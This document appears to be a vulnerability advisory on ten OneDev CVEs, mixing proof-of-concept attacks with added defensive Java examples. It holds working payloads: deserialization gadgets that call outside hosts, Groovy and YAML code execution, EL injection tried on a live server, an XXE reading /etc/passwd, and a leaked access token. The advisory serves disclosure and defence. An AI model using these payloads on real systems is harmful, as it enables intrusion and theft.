# OneDev: multiple high-severity vulnerabilities (CVE-2021-21242~51)

> CVE-2021-21242
> 
> CVE-2021-21243
> 
> CVE-2021-21244
> 
> CVE-2021-21245
> 
> CVE-2021-21246
> 
> CVE-2021-21247
> 
> CVE-2021-21248
> 
> CVE-2021-21249
> 
> CVE-2021-21250
> 
> CVE-2021-21251

**1. Pre-auth unsafe deserialization in AttachmentUploadServlet**

**PoC:**

Use ysoserial with the URLDNS gadget to generate a probe payload. The gadget issues a DNS request, which we can intercept to prove that the deserialization attack succeeded.

```bash
curl -X POST http://localhost:6610/attachment_upload -H "File-Name: foo" -H "Attachment-Support: `java -jar /Users/pwntester/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://536mvpzmverok48wr06msp5du40uoj.burpcollaborator.net | base64`"
```

**2. Pre-auth unsafe deserialization in KubernetesResource**

**PoC:**

```bash
java -jar ~/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://pzs6r9v6ryn8go4gnk26o91xqowgk5.burpcollaborator.net > deser_payload.bin
curl -H "Content-Type:application/octet-stream" --data-binary @deser_payload.bin http://localhost:6610/rest/k8s/allocate-job-caches
```

```bash
java -jar ~/Dev/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://pzs6r9v6ryn8go4gnk26o91xqowgk5.burpcollaborator.net > deser_payload.bin
curl -H "Content-Type:application/octet-stream" --data-binary @deser_payload.bin http://localhost:6610/rest/k8s/report-job-caches
```

**3. Pre-auth SSTI via Bean Validation message tampering**

**PoC:**

The EL expression is URL-encoded and sent as the name of a query parameter, which the server interpolates into the constraint-violation message:

```
${'test'.toUpperCase()} -> %24%7b%27%74%65%73%74%27%2e%74%6f%55%70%70%65%72%43%61%73%65%28%29%7d
```

```bash
curl -X GET -H "Content-Type: application/json" http://localhost:6610/rest/projects\?%24%7b%27%74%65%73%74%27%2e%74%6f%55%70%70%65%72%43%61%73%65%28%29%7d=bar
```

Against the local build the request fails with a missing-method error:

```
Caused by: org.glassfish.jersey.server.ContainerException: java.lang.NoSuchMethodError: javax.el.ELContext.notifyBeforeEvaluation(Ljava/lang/String;)
```

Against code.onedev.io the expression is evaluated and `TEST` appears in the error message:

```bash
curl -X GET -H "Content-Type: application/json"  https://code.onedev.io/rest/projects\?%24%7b%27%74%65%73%74%27%2e%74%6f%55%70%70%65%72%43%61%73%65%28%29%7d=bar
Unexpected query params: [TEST] (path = ProjectResource.query.<cross-parameter>, invalidValue = [null, null, null, org.glassfish.jersey.server.internal.routing.UriRoutingContext@5b27a361])
```

**4. Pre-auth arbitrary file upload**

The decoded `File-Name` header is passed straight to `saveAttachment` without any path normalisation:

```java
String fileName = URLDecoder.decode(request.getHeader("File-Name"), StandardCharsets.UTF_8.name());
...
String attachmentName = attachmentSuppport.saveAttachment(fileName, request.getInputStream());
```

**5. Pre-auth access token leak**

**PoC:**

```bash
curl -X GET -H "Content-Type: application/json" http://localhost:6610/rest/users
Unauthorized access to user profiles
```

```bash
curl -X GET -H "Content-Type: application/json" http://localhost:6610/rest/users/1
{
  "id" : 1,
  "name" : "admin",
  "fullName" : "admin",
  "ssoInfo" : {
    "connector" : null,
    "subject" : "4a155bff-715d-45e9-8898-4152bb97d25e"
  },
  "email" : "[email protected]",
  "accessToken" : "JqnqWs6YsP8x3poNpnj6J6GFbvh0szli6lr5BWH8",
  "userProjectQueries" : [ ],
  "userIssueQueries" : [ ],
  "userIssueQueryWatches" : { },
  "issueQueryWatches" : { },
  "userPullRequestQueries" : [ ],
  "userPullRequestQueryWatches" : { },
  "pullRequestQueryWatches" : { },
  "userBuildQueries" : [ ],
  "userBuildQuerySubscriptions" : [ ],
  "buildQuerySubscriptions" : [ ]
}
```

**6. Post-auth unsafe deserialization in BasePage (AJAX)**

**PoC:**

```http
POST /projects/my-app/blob?7-1.IBehaviorListener.0- HTTP/1.1
Host: localhost:6610
Content-Length: 389
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
Wicket-Ajax-BaseURL: projects/my-app/blob
Wicket-Ajax: true
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:6610
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:6610/projects/my-app/blob
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: JSESSIONID=node0cq7tdfxnza2v1nb58f7zwg7jj6.node0
Connection: close

data=rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3OAAKVW5pY2FzdFJlZgAPdG91Y2ggL3RtcC9mb29vAACFE//////C/CKmAAAAAAAAAAAAAAAAAAAAeA==
```

Requires authentication.
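Items 1, 2 and 6 all reduce to an `ObjectInputStream.readObject()` on attacker-supplied bytes. The standard mitigation, besides not deserializing untrusted input at all, is a deserialization filter that rejects every class the endpoint does not expect. The following is an added example, not OneDev's code or part of the advisory; it assumes Java 9+ (`java.io.ObjectInputFilter`, also back-ported to 8u121+ under `sun.misc`) and uses a `HashMap` as a constructed stand-in for a gadget class.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;

/** Added example: a class allow-list applied to readObject() (not OneDev's code). */
public class FilteredDeserialization {

    // Filter pattern: ';'-separated entries, first match wins, '!' rejects, '*' wildcard,
    // and resource limits (maxdepth, maxarray, maxrefs, maxbytes) bound the graph size.
    // Only the types this endpoint legitimately expects are listed; "!*" rejects the rest.
    private static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "maxdepth=8;maxarray=10000;java.util.ArrayList;java.lang.String;!*");

    /** Deserializes with the allow-list; a rejected class raises InvalidClassException. */
    public static Object readFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(data))) {
            in.setObjectInputFilter(FILTER);
            return in.readObject();
        }
    }

    /** Helper to build sample streams in memory (constructed input, not a real payload). */
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        List<String> expected = new ArrayList<>();
        expected.add("cache-a");
        System.out.println("accepted: " + readFiltered(serialize(expected)));

        // Any class outside the allow-list stands in for a gadget chain here.
        byte[] unexpected = serialize(new HashMap<String, String>());
        try {
            readFiltered(unexpected);
            System.out.println("unexpectedly accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected by filter: " + e.getMessage());
        }
    }
}
```

A filter set per stream, as above, is the precise fix for a single endpoint; the JVM-wide `jdk.serialFilter` system property applies the same pattern language to every `ObjectInputStream` in the process and is a useful backstop when the application code cannot be changed immediately.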
    
**7. Post-auth arbitrary code execution via Groovy script injection**

**PoC:**

```groovy
foo") public String foo() {return "";}; static {Runtime.getRuntime().exec("touch /tmp/pwned1");} //
```

**8. Post-auth unsafe YAML deserialization**

```yaml
version: 1
jobs:
- name: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://qgayzevwou8by0k3ochje4ebx23srh.burpcollaborator.net"]]]]
  image: asdasd
  commands:
  - asd
  retrieveSource: true
  cloneCredential: !DefaultCredential {}
  cpuRequirement: 250m
  memoryRequirement: 128m
  retryCondition: never
  maxRetries: 3
  retryDelay: 30
  timeout: 3600
```
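The `!!javax.script.ScriptEngineManager` tag works because SnakeYAML's default `Constructor` instantiates any class named by a global tag. Loading untrusted YAML with `SafeConstructor` limits the result to maps, lists and scalars and turns any such tag into a parse error. This is an added example, not OneDev's code or part of the advisory; it assumes SnakeYAML 1.x on the classpath (in 2.x the constructor takes a `LoaderOptions`) and uses a constructed document with a placeholder host.

```java
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

/** Added example: loading untrusted YAML without class instantiation (not OneDev's code). */
public class SafeYamlLoad {

    // Constructed sample shaped like the advisory's document, with a placeholder URL.
    static final String HOSTILE =
            "version: 1\n"
          + "jobs:\n"
          + "- name: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://example.invalid/\"]]]]\n"
          + "  image: asdasd\n";

    static final String BENIGN =
            "version: 1\n"
          + "jobs:\n"
          + "- name: build\n"
          + "  image: alpine\n";

    /**
     * Parses YAML into plain Java collections only. SafeConstructor knows no application
     * classes, so a global tag naming one raises a YAMLException instead of instantiating it.
     */
    public static Object loadSafely(String yaml) {
        Yaml parser = new Yaml(new SafeConstructor()); // SnakeYAML 2.x: new SafeConstructor(new LoaderOptions())
        return parser.load(yaml);
    }

    public static void main(String[] args) {
        System.out.println("benign document -> " + loadSafely(BENIGN));
        try {
            loadSafely(HOSTILE);
            System.out.println("hostile document was accepted (unexpected)");
        } catch (YAMLException e) {
            System.out.println("hostile document rejected: " + e.getMessage());
        }
    }
}
```

Where the application needs its own tags, such as the `!DefaultCredential` seen in the build spec, the right pattern is a `SafeConstructor` subclass that registers exactly those tags, rather than falling back to the permissive default constructor.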
    
**9. Post-auth XML external entity expansion (XXE)**

**PoC:**

```xml
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>
```
    
**10. Zip Slip arbitrary file upload**

```java
import io.onedev.commons.utils.TarUtils;
import java.io.FileInputStream;
import java.io.File;

// Extracts a crafted archive with TarUtils; an entry name containing "../" lands outside ./dest.
public class UnTarTest {
  public static void main(String[] args) {
    try {
      FileInputStream is = new FileInputStream(new File("./zip-slip.tar"));
      TarUtils.untar(is, new File("./dest"));
    } catch (Exception e) {
      e.printStackTrace();
    }
  }
}
```
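Item 4 and item 10 are the same defect from the defender's side: a name the client controls (the `File-Name` header, or an archive entry name) is joined to a base directory without checking that the result stays inside it. The check is to canonicalise the joined path and compare it component-wise against the canonical base. The following is an added example, not OneDev's code or part of the advisory; it assumes Java 9+ and uses the JDK's `ZipInputStream` instead of the project's `TarUtils`, since the containment check is independent of the archive format, and it builds its sample archive in memory.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

/** Added example: path-containment check for uploads and archive entries (not OneDev's code). */
public class SafeExtract {

    /**
     * Resolves an untrusted name under baseDir and proves the canonical result is still inside it.
     * Canonicalisation collapses "..", "." and symlinks; Path.startsWith compares whole components,
     * so "/dest2" is not mistaken for a child of "/dest".
     */
    public static File resolveInside(File baseDir, String untrustedName) throws IOException {
        File base = baseDir.getCanonicalFile();
        File target = new File(base, untrustedName).getCanonicalFile();
        if (!target.toPath().startsWith(base.toPath())) {
            throw new IOException("path escapes destination: " + untrustedName);
        }
        return target;
    }

    /** Extracts into dest; returns {written, rejected} counts, skipping entries that would escape. */
    public static int[] unzip(InputStream in, File dest) throws IOException {
        int written = 0, rejected = 0;
        try (ZipInputStream zin = new ZipInputStream(in)) {
            for (ZipEntry e; (e = zin.getNextEntry()) != null; ) {
                File out;
                try {
                    out = resolveInside(dest, e.getName());
                } catch (IOException escape) {
                    rejected++;
                    continue;
                }
                if (e.isDirectory()) {
                    out.mkdirs();
                    continue;
                }
                out.getParentFile().mkdirs();
                try (FileOutputStream fos = new FileOutputStream(out)) {
                    zin.transferTo(fos); // reads to the end of the current entry only
                }
                written++;
            }
        }
        return new int[] {written, rejected};
    }

    /** Constructed sample archive: one honest entry and one Zip Slip entry. */
    static byte[] sampleZip() throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ZipOutputStream zos = new ZipOutputStream(bos)) {
            zos.putNextEntry(new ZipEntry("ok.txt"));
            zos.write("fine".getBytes(StandardCharsets.UTF_8));
            zos.closeEntry();
            zos.putNextEntry(new ZipEntry("../evil.txt"));
            zos.write("escaped".getBytes(StandardCharsets.UTF_8));
            zos.closeEntry();
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws IOException {
        Path tmp = Files.createTempDirectory("safe-extract");
        File dest = tmp.resolve("dest").toFile();
        int[] r = unzip(new ByteArrayInputStream(sampleZip()), dest);
        System.out.println("written=" + r[0] + " rejected=" + r[1]);
        System.out.println("escaped file exists? " + tmp.resolve("evil.txt").toFile().exists());
    }
}
```

The same `resolveInside` call is the fix for item 4: pass the decoded `File-Name` value and the attachment directory through it before calling anything like `saveAttachment`, and reject rather than silently rename when the check fails, so the event is visible in logs.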
    
    
    
Source: https://securitylab.github.com/advisories/GHSL-2020-214_223-onedev
    